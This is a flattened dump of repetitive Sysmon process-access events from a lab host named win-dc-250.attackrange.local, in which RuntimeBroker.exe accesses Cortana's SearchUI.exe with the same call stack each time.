13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 